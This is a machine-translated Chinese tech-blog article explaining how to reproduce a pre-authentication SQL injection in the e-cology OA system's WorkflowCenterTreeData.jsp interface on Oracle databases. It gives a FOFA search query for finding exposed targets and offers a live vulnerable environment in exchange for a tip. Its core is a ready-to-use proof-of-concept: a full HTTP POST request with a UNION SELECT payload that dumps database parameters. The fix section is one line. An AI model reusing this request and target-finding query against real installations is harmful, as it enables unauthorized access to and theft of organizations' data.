Shulou(Shulou.com)06/01 Report--

This article introduces the e-cology OA foreground SQL injection vulnerability recurrence is how, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Introduction to 0x00

E-cology provides functions such as mobile office, Wechat office, collaborative office (OA), process management, information portal, knowledge management, cost control management and so on. It is suitable for mobile phones and PCs. It is one of the mainstream OA systems nowadays.

Overview of the principle of 0x01

The flaw is due to the fact that the WorkflowCenterTreeData interface of the OA system is not securely filtered when receiving user input, and malicious SQL statements are passed into the oracle database, resulting in SQL vulnerabilities.

0x02 scope of influence

Pan-micro e-cology OA system using oracle database

0x03 environment building

Online environment (tonight only):

Reward (arbitrary amount) + forward, contact the author to get

FOFA search:

App= "Pan Micro-Collaborative Office OA"

Build on your own:

Reply to "pan-micro environment" in the official account.

0x04 vulnerability exploitation

Use Poc directly after finding the pan-micro OA system of oracle database (disclosed)

If there is no vulnerability, the result is displayed as follows

If the vulnerability exists, a lot of data will be echoed directly.

The concise version of Poc is as follows: (do not use it in illegal ways)

POST / mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en Q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 2236Connection: closeUpgrade-Insecure-Requests: 1

Formids=11111111111))% 0a%0dunion select NULL,value from v$parameter order by (1)

0x05 repair recommendation

The official website has been updated, please update as soon as possible.

About the e-cology OA foreground SQL injection vulnerability recurrence is how to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.